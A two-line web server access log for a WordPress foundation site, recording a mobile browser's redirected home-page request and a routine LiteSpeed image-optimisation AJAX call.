222.79.103.59 - - [10/Jan/2025:11:41:10 -0500] "GET / HTTP/1.1" 301 0 "http://www.tacafoundation.org" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
66.29.132.124 - - [10/Jan/2025:11:41:16 -0500] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=LrxkFEr7bMHT92AK3hKc6VBuPWusdTcC&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.7.1; https://tacafoundation.org"
